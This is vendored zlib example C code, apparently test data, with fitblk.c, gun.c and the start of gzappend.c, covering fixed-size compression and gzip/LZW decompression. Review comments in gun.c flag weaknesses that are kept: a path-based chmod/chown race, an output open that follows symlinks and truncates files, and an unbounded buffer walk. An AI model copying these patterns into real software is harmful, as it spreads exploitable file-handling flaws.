FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/fitblk.c
================================================
/* fitblk.c: example of fitting compressed output to a specified size
   Not copyrighted -- provided to the public domain
   Version 1.1 25 November 2004 Mark Adler */

/* Version history:
   1.0 24 Nov 2004 First version
   1.1 25 Nov 2004 Change deflateInit2() to deflateInit()
                   Use fixed-size, stack-allocated raw buffers
                   Simplify code moving compression to subroutines
                   Use assert() for internal errors
                   Add detailed description of approach
 */

/* Approach to just fitting a requested compressed size:

   fitblk performs three compression passes on a portion of the input
   data in order to determine how much of that input will compress to
   nearly the requested output block size.
The first pass generates
   enough deflate blocks to produce output to fill the requested
   output size plus a specified excess amount (see the EXCESS define
   below). The last deflate block may go quite a bit past that, but
   is discarded. The second pass decompresses and recompresses just
   the compressed data that fit in the requested plus excess sized
   buffer. The deflate process is terminated after that amount of
   input, which is less than the amount consumed on the first pass.
   The last deflate block of the result will be of a comparable size
   to the final product, so that the header for that deflate block and
   the compression ratio for that block will be about the same as in
   the final product. The third compression pass decompresses the
   result of the second step, but only the compressed data up to the
   requested size minus an amount to allow the compressed stream to
   complete (see the MARGIN define below). That will result in a
   final compressed stream whose length is less than or equal to the
   requested size. Assuming sufficient input and a requested size
   greater than a few hundred bytes, the shortfall will typically be
   less than ten bytes.

   If the input is short enough that the first compression completes
   before filling the requested output size, then that compressed
   stream is returned with no recompression.

   EXCESS is chosen to be just greater than the shortfall seen in a
   two pass approach similar to the above. That shortfall is due to
   the last deflate block compressing more efficiently with a smaller
   header on the second pass. EXCESS is set to be large enough so
   that there is enough uncompressed data for the second pass to fill
   out the requested size, and small enough so that the final deflate
   block of the second pass will be close in size to the final deflate
   block of the third and final pass. MARGIN is chosen to be just
   large enough to assure that the final compression has enough room
   to complete in all cases.
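*/

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <limits.h>
#include "zlib.h"

#define local static

/* print nastygram and leave -- writes why to stderr and exits with status 1 */
local void quit(char *why)
{
    fprintf(stderr, "fitblk abort: %s\n", why);
    exit(1);
}

#define RAWLEN 4096    /* intermediate uncompressed buffer size */

/* compress from file to def until provided buffer is full or end of
   input reached; return last deflate() return value, or Z_ERRNO if
   there was read error on the file

   def->next_out and def->avail_out must be set by the caller; the loop ends
   when the output space is used up or when deflate() has been called with
   Z_FINISH after end of file was seen */
local int partcompress(FILE *in, z_streamp def)
{
    int ret, flush;
    unsigned char raw[RAWLEN];

    flush = Z_NO_FLUSH;
    do {
        def->avail_in = fread(raw, 1, RAWLEN, in);
        if (ferror(in))
            return Z_ERRNO;
        def->next_in = raw;
        if (feof(in))
            flush = Z_FINISH;
        ret = deflate(def, flush);
        assert(ret != Z_STREAM_ERROR);
    } while (def->avail_out != 0 && flush == Z_NO_FLUSH);
    return ret;
}

/* recompress from inf's input to def's output; the input for inf and
   the output for def are set in those structures before calling;
   return last deflate() return value, or Z_MEM_ERROR if inflate()
   was not able to allocate enough memory when it needed to

   the other inflate() failures are ruled out with assert() only -- that is
   enough here because the data being inflated was produced by deflate() in
   this same program, but it is not a check that survives NDEBUG */
local int recompress(z_streamp inf, z_streamp def)
{
    int ret, flush;
    unsigned char raw[RAWLEN];

    flush = Z_NO_FLUSH;
    do {
        /* decompress */
        inf->avail_out = RAWLEN;
        inf->next_out = raw;
        ret = inflate(inf, Z_NO_FLUSH);
        assert(ret != Z_STREAM_ERROR && ret != Z_DATA_ERROR &&
               ret != Z_NEED_DICT);
        if (ret == Z_MEM_ERROR)
            return ret;

        /* compress what was decompressed until done or no room -- a
           partly filled raw buffer means inflate() ran out of input,
           so this is the last piece to compress */
        def->avail_in = RAWLEN - inf->avail_out;
        def->next_in = raw;
        if (inf->avail_out != 0)
            flush = Z_FINISH;
        ret = deflate(def, flush);
        assert(ret != Z_STREAM_ERROR);
    } while (ret != Z_STREAM_END && def->avail_out != 0);
    return ret;
}

#define EXCESS 256      /* empirically determined stream overage */
#define MARGIN 8        /* amount to back off for completion */

/* compress from stdin to fixed-size block on stdout

   the single argument is the requested block size in bytes, 8 or more;
   the size is parsed as a long and range checked before it is narrowed, so
   that a value too large for an int is refused instead of being silently
   truncated to some other size; every failure ends in quit(), success
   returns 0 with a summary on stderr */
int main(int argc, char **argv)
{
    int ret;                /* return code */
    long req;               /* requested size as parsed from the argument */
    char *end;              /* first character not consumed by strtol() */
    unsigned size;          /* requested fixed output block size */
    unsigned have;          /* bytes written by deflate() call */
    unsigned char *blk;     /* intermediate and final stream */
    unsigned char *tmp;     /* close to desired size stream */
    z_stream def, inf;      /* zlib deflate and inflate states */

    /* get requested output size */
    if (argc != 2)
        quit("need one argument: size of output block");
    req = strtol(argv[1], &end, 10);
    if (*end != 0)
        quit("argument must be a number");
    if (req < 8)            /* 8 is minimum zlib stream size */
        quit("need positive size of 8 or greater");
    if (req > INT_MAX)      /* keeps size + EXCESS within an unsigned */
        quit("requested size is too large");
    size = (unsigned)req;

    /* allocate memory for buffers and compression engine */
    blk = malloc(size + EXCESS);
    def.zalloc = Z_NULL;
    def.zfree = Z_NULL;
    def.opaque = Z_NULL;
    ret = deflateInit(&def, Z_DEFAULT_COMPRESSION);
    if (ret != Z_OK || blk == NULL)
        quit("out of memory");

    /* compress from stdin until output full, or no more input */
    def.avail_out = size + EXCESS;
    def.next_out = blk;
    ret = partcompress(stdin, &def);
    if (ret == Z_ERRNO)
        quit("error reading input");

    /* if it all fit, then size was undersubscribed -- done! */
    if (ret == Z_STREAM_END && def.avail_out >= EXCESS) {
        /* write block to stdout */
        have = size + EXCESS - def.avail_out;
        if (fwrite(blk, 1, have, stdout) != have || ferror(stdout))
            quit("error writing output");

        /* clean up and print results to stderr */
        ret = deflateEnd(&def);
        assert(ret != Z_STREAM_ERROR);
        free(blk);
        fprintf(stderr,
                "%u bytes unused out of %u requested (all input)\n",
                size - have, size);
        return 0;
    }

    /* it didn't all fit -- set up for recompression */
    inf.zalloc = Z_NULL;
    inf.zfree = Z_NULL;
    inf.opaque = Z_NULL;
    inf.avail_in = 0;
    inf.next_in = Z_NULL;
    ret = inflateInit(&inf);
    tmp = malloc(size + EXCESS);
    if (ret != Z_OK || tmp == NULL)
        quit("out of memory");
    ret = deflateReset(&def);
    assert(ret != Z_STREAM_ERROR);

    /* do first recompression close to the right amount */
    inf.avail_in = size + EXCESS;
    inf.next_in = blk;
    def.avail_out = size + EXCESS;
    def.next_out = tmp;
    ret = recompress(&inf, &def);
    if (ret == Z_MEM_ERROR)
        quit("out of memory");

    /* set up for next recompression */
    ret = inflateReset(&inf);
    assert(ret != Z_STREAM_ERROR);
    ret = deflateReset(&def);
    assert(ret != Z_STREAM_ERROR);

    /* do second and final recompression (third compression) */
    inf.avail_in = size - MARGIN;   /* assure stream will complete */
    inf.next_in = tmp;
    def.avail_out = size;
    def.next_out = blk;
    ret = recompress(&inf, &def);
    if (ret == Z_MEM_ERROR)
        quit("out of memory");
    assert(ret == Z_STREAM_END);    /* otherwise MARGIN too small */

    /* done -- write block to stdout */
    have = size - def.avail_out;
    if (fwrite(blk, 1, have, stdout) != have || ferror(stdout))
        quit("error writing output");

    /* clean up and print results to stderr */
    free(tmp);
    ret = inflateEnd(&inf);
    assert(ret != Z_STREAM_ERROR);
    ret = deflateEnd(&def);
    assert(ret != Z_STREAM_ERROR);
    free(blk);
    fprintf(stderr,
            "%u bytes unused out of %u requested (%lu input)\n",
            size - have, size, def.total_in);
    return 0;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gun.c
================================================
/* gun.c -- simple gunzip to give an example of the use of inflateBack()
 * Copyright (C) 2003, 2005, 2008, 2010, 2012 Mark Adler
 * For conditions of distribution and use, see copyright notice in zlib.h
   Version 1.7 12 August 2012 Mark Adler */

/* Version history:
   1.0 16 Feb 2003 First version for testing of inflateBack()
   1.1 21 Feb 2005 Decompress concatenated gzip streams
                   Remove use of "this" variable (C++ keyword)
                   Fix return value for in()
                   Improve allocation failure checking
                   Add typecasting for void * structures
                   Add -h option for command version and usage
                   Add a bunch of comments
   1.2 20 Mar 2005 Add Unix compress (LZW) decompression
                   Copy file attributes from input file to output file
   1.3 12 Jun 2005 Add casts for error messages [Oberhumer]
   1.4 8 Dec 2006 LZW decompression speed improvements
   1.5 9 Feb 2008 Avoid warning in latest version of gcc
   1.6 17 Jan 2010 Avoid signed/unsigned comparison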
warnings 1.7 12 Aug 2012 Update for z_const usage in zlib 1.2.8 */ /* gun [ -t ] [ name ... ] decompresses the data in the named gzip files. If no arguments are given, gun will decompress from stdin to stdout. The names must end in .gz, -gz, .z, -z, _z, or .Z. The uncompressed data will be written to a file name with the suffix stripped. On success, the original file is deleted. On failure, the output file is deleted. For most failures, the command will continue to process the remaining names on the command line. A memory allocation failure will abort the command. If -t is specified, then the listed files or stdin will be tested as gzip files for integrity (without checking for a proper suffix), no output will be written, and no files will be deleted. Like gzip, gun allows concatenated gzip streams and will decompress them, writing all of the uncompressed data to the output. Unlike gzip, gun allows an empty file on input, and will produce no error writing an empty output file. gun will also decompress files made by Unix compress, which uses LZW compression. These files are automatically detected by virtue of their magic header bytes. Since the end of Unix compress stream is marked by the end-of-file, they cannot be concatenated. If a Unix compress stream is encountered in an input file, it is the last stream in that file. Like gunzip and uncompress, the file attributes of the original compressed file are maintained in the final uncompressed file, to the extent that the user permissions allow it. On my Mac OS X PowerPC G4, gun is almost twice as fast as gunzip (version 1.2.4) is on the same file, when gun is linked with zlib 1.2.2. Also the LZW decompression provided by gun is about twice as fast as the standard Unix uncompress command. 
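*/

/* external functions and related types and constants */
/* NOTE(review): the header names had been lost from the #include lines in
   this copy; they are restored here to match the functions listed beside
   each directive. */
#include <stdio.h>          /* fprintf() */
#include <stdlib.h>         /* malloc(), free() */
#include <string.h>         /* strerror(), strcmp(), strlen(), memcpy() */
#include <errno.h>          /* errno */
#include <fcntl.h>          /* open() */
#include <unistd.h>         /* read(), write(), close(), chown(), unlink() */
#include <sys/types.h>
#include <sys/stat.h>       /* stat(), chmod() */
#include <utime.h>          /* utime() */
#include "zlib.h"           /* inflateBackInit(), inflateBack(), */
                            /* inflateBackEnd(), crc32() */

/* function declaration */
#define local static

/* buffer constants */
#define SIZE 32768U         /* input and output buffer sizes */
#define PIECE 16384         /* limits i/o chunks for 16-bit int case */

/* structure for infback() to pass to input function in() -- it maintains the
   input file and a buffer of size SIZE */
struct ind {
    int infile;
    unsigned char *inbuf;
};

/* Load input buffer, assumed to be empty, and return bytes loaded and a
   pointer to them.  read() is called until the buffer is full, or until it
   returns end-of-file or error.  Return 0 on error.

   in_desc is a struct ind *; *buf is set to the start of its buffer.  The
   return value never exceeds SIZE, because each read() is capped at
   SIZE - len.  A return of 0 is ambiguous between end-of-file and a read
   error: on error any bytes already loaded are discarded, and the caller has
   to look at errno to tell the two apart. */
local unsigned in(void *in_desc, z_const unsigned char **buf)
{
    int ret;
    unsigned len;
    unsigned char *next;
    struct ind *me = (struct ind *)in_desc;

    next = me->inbuf;
    *buf = next;
    len = 0;
    do {
        /* ask for at most PIECE bytes, and never more than the room left */
        ret = PIECE;
        if ((unsigned)ret > SIZE - len)
            ret = (int)(SIZE - len);
        ret = (int)read(me->infile, next, ret);
        if (ret == -1) {
            len = 0;
            break;
        }
        next += ret;
        len += ret;
    } while (ret != 0 && len < SIZE);
    return len;
}

/* structure for infback() to pass to output function out() -- it maintains the
   output file, a running CRC-32 check on the output and the total number of
   bytes output, both for checking against the gzip trailer.  (The length in
   the gzip trailer is stored modulo 2^32, so it's ok if a long is 32 bits and
   the output is greater than 4 GB.) */
struct outd {
    int outfile;
    int check;                  /* true if checking crc and total */
    unsigned long crc;
    unsigned long total;
};

/* Write output buffer and update the CRC-32 and total bytes written.  write()
   is called until all of the output is written or an error is encountered.
   On success out() returns 0.  For a write failure, out() returns 1.  If the
   output file descriptor is -1, then nothing is written.

   out_desc is a struct outd *.  The CRC-32 and total are updated before the
   write is attempted, so they cover the data even when outfile is -1 (the
   test-only case). */
local int out(void *out_desc, unsigned char *buf, unsigned len)
{
    int ret;
    struct outd *me = (struct outd *)out_desc;

    if (me->check) {
        me->crc = crc32(me->crc, buf, len);
        me->total += len;
    }
    if (me->outfile != -1)
        do {
            /* write at most PIECE bytes per call; short writes are retried */
            ret = PIECE;
            if ((unsigned)ret > len)
                ret = (int)len;
            ret = (int)write(me->outfile, buf, ret);
            if (ret == -1)
                return 1;
            buf += ret;
            len -= ret;
        } while (len != 0);
    return 0;
}

/* next input byte macro for use inside lunpipe() and gunpipe() -- it refills
   through in() when have is zero, stores the byte (or -1 at end of input or
   on a read error) in last, and yields that value; it uses the caller's
   have, next, indp and last variables */
#define NEXT() (have ? 0 : (have = in(indp, &next)), \
                last = have ? (have--, (int)(*next++)) : -1)

/* memory for gunpipe() and lunpipe() --
   the first 256 entries of prefix[] and suffix[] are never used, could
   have offset the index, but it's faster to waste the memory */
unsigned char inbuf[SIZE];              /* input buffer */
unsigned char outbuf[SIZE];             /* output buffer */
unsigned short prefix[65536];           /* index to LZW prefix string */
unsigned char suffix[65536];            /* one-character LZW suffix */
unsigned char match[65280 + 2];         /* buffer for reversed match or gzip
                                           32K sliding window */

/* throw out what's left in the current bits byte buffer (this is a vestigial
   aspect of the compressed data format derived from an implementation that
   made use of a special VAX machine instruction!) */
#define FLUSHCODE() \
    do { \
        left = 0; \
        rem = 0; \
        if (chunk > have) { \
            chunk -= have; \
            have = 0; \
            if (NEXT() == -1) \
                break; \
            chunk--; \
            if (chunk > have) { \
                chunk = have = 0; \
                break; \
            } \
        } \
        have -= chunk; \
        next += chunk; \
        chunk = 0; \
    } while (0)

/* Decompress a compress (LZW) file from indp to outfile.  The compress magic
   header (two bytes) has already been read and verified.  There are have bytes
   of buffered input at next.  strm is used for passing error information back
   to gunpipe().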
lunpipe() will return Z_OK on success, Z_BUF_ERROR for an unexpected end of
   file, read error, or write error (a write error indicated by strm->next_in
   not equal to Z_NULL), or Z_DATA_ERROR for invalid input.
 */
local int lunpipe(unsigned have, z_const unsigned char *next, struct ind *indp,
                  int outfile, z_stream *strm)
{
    int last;                   /* last byte read by NEXT(), or -1 if EOF */
    unsigned chunk;             /* bytes left in current chunk */
    int left;                   /* bits left in rem */
    unsigned rem;               /* unused bits from input */
    int bits;                   /* current bits per code */
    unsigned code;              /* code, table traversal index */
    unsigned mask;              /* mask for current bits codes */
    int max;                    /* maximum bits per code for this stream */
    unsigned flags;             /* compress flags, then block compress flag */
    unsigned end;               /* last valid entry in prefix/suffix tables */
    unsigned temp;              /* current code */
    unsigned prev;              /* previous code */
    unsigned final;             /* last character written for previous code */
    unsigned stack;             /* next position for reversed string */
    unsigned outcnt;            /* bytes in output buffer */
    struct outd outd;           /* output structure */
    unsigned char *p;

    /* set up output -- no CRC or length is tracked for compress streams */
    outd.outfile = outfile;
    outd.check = 0;

    /* process remainder of compress header -- a flags byte */
    flags = NEXT();
    if (last == -1)
        return Z_BUF_ERROR;
    if (flags & 0x60) {
        strm->msg = (char *)"unknown lzw flags set";
        return Z_DATA_ERROR;
    }
    /* the code width comes from the input, so it is range-checked here:
       with max <= 16, mask never exceeds 0xffff, and end is only ever
       incremented while end < mask, which keeps every prefix[]/suffix[]
       index inside the 65536-entry tables */
    max = flags & 0x1f;
    if (max < 9 || max > 16) {
        strm->msg = (char *)"lzw bits out of range";
        return Z_DATA_ERROR;
    }
    if (max == 9)                           /* 9 doesn't really mean 9 */
        max = 10;
    flags &= 0x80;                          /* true if block compress */

    /* clear table */
    bits = 9;
    mask = 0x1ff;
    end = flags ? 256 : 255;

    /* set up: get first 9-bit code, which is the first decompressed byte, but
       don't create a table entry until the next code */
    if (NEXT() == -1)                       /* no compressed data is ok */
        return Z_OK;
    final = prev = (unsigned)last;          /* low 8 bits of code */
    if (NEXT() == -1)                       /* missing a bit */
        return Z_BUF_ERROR;
    if (last & 1) {                         /* code must be < 256 */
        strm->msg = (char *)"invalid lzw code";
        return Z_DATA_ERROR;
    }
    rem = (unsigned)last >> 1;              /* remaining 7 bits */
    left = 7;
    chunk = bits - 2;                       /* 7 bytes left in this chunk */
    outbuf[0] = (unsigned char)final;       /* write first decompressed byte */
    outcnt = 1;

    /* decode codes */
    stack = 0;
    for (;;) {
        /* if the table will be full after this, increment the code size */
        if (end >= mask && bits < max) {
            FLUSHCODE();
            bits++;
            mask <<= 1;
            mask++;
        }

        /* get a code of length bits */
        if (chunk == 0)                     /* decrement chunk modulo bits */
            chunk = bits;
        code = rem;                         /* low bits of code */
        if (NEXT() == -1) {                 /* EOF is end of compressed data */
            /* write remaining buffered output */
            if (outcnt && out(&outd, outbuf, outcnt)) {
                strm->next_in = outbuf;     /* signal write error */
                return Z_BUF_ERROR;
            }
            return Z_OK;
        }
        code += (unsigned)last << left;     /* middle (or high) bits of code */
        left += 8;
        chunk--;
        if (bits > left) {                  /* need more bits */
            if (NEXT() == -1)               /* can't end in middle of code */
                return Z_BUF_ERROR;
            code += (unsigned)last << left; /* high bits of code */
            left += 8;
            chunk--;
        }
        code &= mask;                       /* mask to current code length */
        left -= bits;                       /* number of unused bits */
        rem = (unsigned)last >> (8 - left); /* unused bits from last byte */

        /* process clear code (256) */
        if (code == 256 && flags) {
            FLUSHCODE();
            bits = 9;                       /* initialize bits and mask */
            mask = 0x1ff;
            end = 255;                      /* empty table */
            continue;                       /* get next code */
        }

        /* special code to reuse last match */
        temp = code;                        /* save the current code */
        if (code > end) {
            /* Be picky on the allowed code here, and make sure that the code
               we drop through (prev) will be a valid index so that random
               input does not cause an exception.  The code != end + 1 check is
               empirically derived, and not checked in the original uncompress
               code.  If this ever causes a problem, that check could be safely
               removed.  Leaving this check in greatly improves gun's ability
               to detect random or corrupted input after a compress header.
               In any case, the prev > end check must be retained. */
            if (code != end + 1 || prev > end) {
                strm->msg = (char *)"invalid lzw code";
                return Z_DATA_ERROR;
            }
            match[stack++] = (unsigned char)final;
            code = prev;
        }

        /* walk through linked list to generate output in reverse order --
           code is at most end here (either it was already, or it was replaced
           by prev after the prev > end check above) */
        /* NOTE(review): p is advanced without being compared against the end
           of match[]; the bound presumably relies on the chain length being
           limited by the table size, which is what the 65280 + 2 sizing of
           match[] appears to allow for -- confirm before changing either */
        p = match + stack;
        while (code >= 256) {
            *p++ = suffix[code];
            code = prefix[code];
        }
        stack = p - match;
        match[stack++] = (unsigned char)code;
        final = code;

        /* link new table entry */
        if (end < mask) {
            end++;
            prefix[end] = (unsigned short)prev;
            suffix[end] = (unsigned char)final;
        }

        /* set previous code for next iteration */
        prev = temp;

        /* write output in forward order -- outbuf is flushed each time it
           fills to SIZE, so outcnt never passes the end of outbuf[] */
        while (stack > SIZE - outcnt) {
            while (outcnt < SIZE)
                outbuf[outcnt++] = match[--stack];
            if (out(&outd, outbuf, outcnt)) {
                strm->next_in = outbuf;     /* signal write error */
                return Z_BUF_ERROR;
            }
            outcnt = 0;
        }
        p = match + stack;
        do {
            outbuf[outcnt++] = *--p;
        } while (p > match);
        stack = 0;

        /* loop for next code with final and prev as the last match, rem and
           left provide the first 0..7 bits of the next code, end is the last
           valid table entry */
    }
}

/* Decompress a gzip file from infile to outfile.  strm is assumed to have been
   successfully initialized with inflateBackInit().  The input file may consist
   of a series of gzip streams, in which case all of them will be decompressed
   to the output file.  If outfile is -1, then the gzip stream(s) integrity is
   checked and nothing is written.
The return value is a zlib error code: Z_MEM_ERROR if out of memory,
   Z_DATA_ERROR if the header or the compressed data is invalid, or if the
   trailer CRC-32 check or length doesn't match, Z_BUF_ERROR if the input ends
   prematurely or a write error occurs, or Z_ERRNO if junk (not another gzip
   stream) follows a valid gzip stream.
 */
local int gunpipe(z_stream *strm, int infile, int outfile)
{
    int ret, first, last;
    unsigned have, flags, len;
    z_const unsigned char *next = NULL;
    struct ind ind, *indp;
    struct outd outd;

    /* setup input buffer */
    ind.infile = infile;
    ind.inbuf = inbuf;
    indp = &ind;

    /* decompress concatenated gzip streams */
    have = 0;                               /* no input data read in yet */
    first = 1;                              /* looking for first gzip header */
    strm->next_in = Z_NULL;                 /* so Z_BUF_ERROR means EOF */
    for (;;) {
        /* look for the two magic header bytes for a gzip stream -- NEXT()
           stores each byte in last as a side effect, so the tests below
           depend on the left-to-right evaluation of || and && */
        if (NEXT() == -1) {
            ret = Z_OK;
            break;                          /* empty gzip stream is ok */
        }
        if (last != 31 || (NEXT() != 139 && last != 157)) {
            strm->msg = (char *)"incorrect header check";
            ret = first ? Z_DATA_ERROR : Z_ERRNO;
            break;                          /* not a gzip or compress header */
        }
        first = 0;                          /* next non-header is junk */

        /* process a compress (LZW) file -- can't be concatenated after this */
        if (last == 157) {
            ret = lunpipe(have, next, indp, outfile, strm);
            break;
        }

        /* process remainder of gzip header -- until the header is complete,
           running out of input leaves ret at Z_BUF_ERROR */
        ret = Z_BUF_ERROR;
        if (NEXT() != 8) {                  /* only deflate method allowed */
            if (last == -1) break;
            strm->msg = (char *)"unknown compression method";
            ret = Z_DATA_ERROR;
            break;
        }
        flags = NEXT();                     /* header flags */
        NEXT();                             /* discard mod time, xflgs, os */
        NEXT();
        NEXT();
        NEXT();
        NEXT();
        NEXT();
        if (last == -1) break;
        if (flags & 0xe0) {
            strm->msg = (char *)"unknown header flags set";
            ret = Z_DATA_ERROR;
            break;
        }
        if (flags & 4) {                    /* extra field */
            /* the two-byte length comes from the input; it is consumed
               against the bytes actually available, refilling as needed,
               so have is never decremented below zero */
            len = NEXT();
            len += (unsigned)(NEXT()) << 8;
            if (last == -1) break;
            while (len > have) {
                len -= have;
                have = 0;
                if (NEXT() == -1) break;
                len--;
            }
            if (last == -1) break;
            have -= len;
            next += len;
        }
        if (flags & 8)                      /* file name */
            while (NEXT() != 0 && last != -1)
                ;
        if (flags & 16)                     /* comment */
            while (NEXT() != 0 && last != -1)
                ;
        if (flags & 2) {                    /* header crc */
            NEXT();
            NEXT();
        }
        if (last == -1) break;

        /* set up output */
        outd.outfile = outfile;
        outd.check = 1;
        outd.crc = crc32(0L, Z_NULL, 0);
        outd.total = 0;

        /* decompress data to output */
        strm->next_in = next;
        strm->avail_in = have;
        ret = inflateBack(strm, in, indp, out, &outd);
        if (ret != Z_STREAM_END) break;
        next = strm->next_in;
        have = strm->avail_in;
        strm->next_in = Z_NULL;             /* so Z_BUF_ERROR means EOF */

        /* check trailer -- the stored CRC-32 and length are compared byte by
           byte, least significant byte first, against the values out()
           accumulated; a mismatch caused by end of input (last == -1) is
           left as Z_BUF_ERROR rather than reported as a data error */
        ret = Z_BUF_ERROR;
        if (NEXT() != (int)(outd.crc & 0xff) ||
            NEXT() != (int)((outd.crc >> 8) & 0xff) ||
            NEXT() != (int)((outd.crc >> 16) & 0xff) ||
            NEXT() != (int)((outd.crc >> 24) & 0xff)) {
            /* crc error */
            if (last != -1) {
                strm->msg = (char *)"incorrect data check";
                ret = Z_DATA_ERROR;
            }
            break;
        }
        if (NEXT() != (int)(outd.total & 0xff) ||
            NEXT() != (int)((outd.total >> 8) & 0xff) ||
            NEXT() != (int)((outd.total >> 16) & 0xff) ||
            NEXT() != (int)((outd.total >> 24) & 0xff)) {
            /* length error */
            if (last != -1) {
                strm->msg = (char *)"incorrect length check";
                ret = Z_DATA_ERROR;
            }
            break;
        }

        /* go back and look for another gzip stream */
    }

    /* clean up and return */
    return ret;
}

/* Copy file attributes, from -> to, as best we can.  This is best effort, so
   no errors are reported.  The mode bits, including suid, sgid, and the sticky
   bit are copied (if allowed), the owner's user id and group id are copied
   (again if allowed), and the access and modify times are copied. */
/* NOTE(review): every call here takes a path name, not a descriptor, so each
   one acts on whatever from and to name at the moment of the call.  The
   S_IFREG test covers from only; nothing here checks what to refers to.  In a
   directory that other users can write to, the path could presumably be
   replaced between the calls -- confirm against how gun is deployed. */
local void copymeta(char *from, char *to)
{
    struct stat was;
    struct utimbuf when;

    /* get all of from's Unix meta data, return if not a regular file */
    if (stat(from, &was) != 0 || (was.st_mode & S_IFMT) != S_IFREG)
        return;

    /* set to's mode bits, ignore errors */
    (void)chmod(to, was.st_mode & 07777);

    /* copy owner's user and group, ignore errors */
    (void)chown(to, was.st_uid, was.st_gid);

    /* copy access and modify times, ignore errors */
    when.actime = was.st_atime;
    when.modtime = was.st_mtime;
    (void)utime(to, &when);
}

/* Decompress the file inname to the file outname, or if test is true, just
   decompress without writing and check the gzip trailer for integrity.  If
   inname is NULL or an empty string, read from stdin.  If outname is NULL or
   an empty string, write to stdout.  strm is a pre-initialized inflateBack
   structure.  When appropriate, copy the file attributes from inname to
   outname.

   gunzip() returns 1 if there is an out-of-memory error or an unexpected
   return code from gunpipe().  Otherwise it returns 0.
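*/
local int gunzip(z_stream *strm, char *inname, char *outname, int test)
{
    int ret;
    int infile, outfile;
    int err;                    /* errno left by gunpipe() */
    int cerr;                   /* errno from closing the output, or 0 */

    /* open files */
    if (inname == NULL || *inname == 0) {
        inname = "-";
        infile = 0;     /* stdin */
    }
    else {
        infile = open(inname, O_RDONLY, 0);
        if (infile == -1) {
            fprintf(stderr, "gun cannot open %s\n", inname);
            return 0;
        }
    }
    if (test)
        outfile = -1;
    else if (outname == NULL || *outname == 0) {
        outname = "-";
        outfile = 1;    /* stdout */
    }
    else {
        /* NOTE(review): without O_EXCL or O_NOFOLLOW this truncates an
           existing file at outname and follows a symbolic link placed there;
           the 0666 mode is narrowed only by the process umask.  Left as is
           because overwriting is the documented behavior -- confirm that is
           acceptable wherever the output directory is shared. */
        outfile = open(outname, O_CREAT | O_TRUNC | O_WRONLY, 0666);
        if (outfile == -1) {
            if (infile > 2)     /* never close stdin on this path */
                close(infile);
            fprintf(stderr, "gun cannot create %s\n", outname);
            return 0;
        }
    }
    errno = 0;

    /* decompress */
    ret = gunpipe(strm, infile, outfile);
    err = errno;        /* keep the i/o error before close() can replace it */
    cerr = 0;
    if (outfile > 2 && close(outfile) == -1)
        cerr = errno;
    if (infile > 2) close(infile);

    /* a failed close() can be the first report of a write error, so treat it
       like one: remove the output and keep the original file in place */
    if (cerr && (ret == Z_OK || ret == Z_ERRNO)) {
        unlink(outname);
        fprintf(stderr, "gun write error on %s: %s\n",
                outname, strerror(cerr));
        return 0;
    }

    /* interpret result -- descriptors above 2 are taken to be files that
       this function opened, as opposed to stdin and stdout */
    switch (ret) {
    case Z_OK:
    case Z_ERRNO:
        if (infile > 2 && outfile > 2) {
            copymeta(inname, outname);          /* copy attributes */
            unlink(inname);
        }
        if (ret == Z_ERRNO)
            fprintf(stderr, "gun warning: trailing garbage ignored in %s\n",
                    inname);
        break;
    case Z_DATA_ERROR:
        if (outfile > 2) unlink(outname);
        fprintf(stderr, "gun data error on %s: %s\n", inname, strm->msg);
        break;
    case Z_MEM_ERROR:
        if (outfile > 2) unlink(outname);
        fprintf(stderr, "gun out of memory error--aborting\n");
        return 1;
    case Z_BUF_ERROR:
        if (outfile > 2) unlink(outname);
        if (strm->next_in != Z_NULL) {
            fprintf(stderr, "gun write error on %s: %s\n",
                    outname, strerror(err));
        }
        else if (err) {
            fprintf(stderr, "gun read error on %s: %s\n",
                    inname, strerror(err));
        }
        else {
            fprintf(stderr, "gun unexpected end of file on %s\n",
                    inname);
        }
        break;
    default:
        if (outfile > 2) unlink(outname);
        fprintf(stderr, "gun internal error--aborting\n");
        return 1;
    }
    return 0;
}

/* Process the gun command line arguments.  See the command syntax near the
   beginning of this source file.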
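*/
int main(int argc, char **argv)
{
    int ret, len, test;
    char *outname;
    unsigned char *window;
    z_stream strm;

    /* initialize inflateBack state for repeated use -- match[] is declared
       with 65280 + 2 bytes, which is larger than the 32K window that a
       windowBits value of 15 calls for */
    window = match;                         /* reuse LZW match buffer */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    ret = inflateBackInit(&strm, 15, window);
    if (ret != Z_OK) {
        fprintf(stderr, "gun out of memory error--aborting\n");
        return 1;
    }

    /* decompress each file to the same name with the suffix removed */
    argc--;
    argv++;
    test = 0;
    if (argc && strcmp(*argv, "-h") == 0) {
        fprintf(stderr, "gun 1.6 (17 Jan 2010)\n");
        fprintf(stderr, "Copyright (C) 2003-2010 Mark Adler\n");
        fprintf(stderr, "usage: gun [-t] [file1.gz [file2.Z ...]]\n");
        return 0;
    }
    if (argc && strcmp(*argv, "-t") == 0) {
        test = 1;
        argc--;
        argv++;
    }
    if (argc)
        do {
            if (test)
                outname = NULL;
            else {
                /* the suffix is compared only when the name is at least as
                   long as the suffix, so that *argv + len - n never points
                   in front of the start of the argument */
                len = (int)strlen(*argv);
                if (len >= 3 &&
                    (strcmp(*argv + len - 3, ".gz") == 0 ||
                     strcmp(*argv + len - 3, "-gz") == 0))
                    len -= 3;
                else if (len >= 2 &&
                         (strcmp(*argv + len - 2, ".z") == 0 ||
                          strcmp(*argv + len - 2, "-z") == 0 ||
                          strcmp(*argv + len - 2, "_z") == 0 ||
                          strcmp(*argv + len - 2, ".Z") == 0))
                    len -= 2;
                else {
                    fprintf(stderr, "gun error: no gz type on %s--skipping\n",
                            *argv);
                    continue;
                }
                outname = malloc(len + 1);
                if (outname == NULL) {
                    fprintf(stderr, "gun out of memory error--aborting\n");
                    ret = 1;
                    break;
                }
                memcpy(outname, *argv, len);
                outname[len] = 0;
            }
            ret = gunzip(&strm, *argv, outname, test);
            if (outname != NULL) free(outname);
            if (ret) break;
        } while (argv++, --argc);
    else
        ret = gunzip(&strm, NULL, NULL, test);

    /* clean up */
    inflateBackEnd(&strm);
    return ret;
}

================================================
FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzappend.c
================================================
/* gzappend -- command to append to a gzip file

  Copyright (C) 2003, 2012 Mark Adler, all rights reserved
  version 1.2, 11 Oct 2012

  This software is provided 'as-is', without any express or implied
  warranty.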
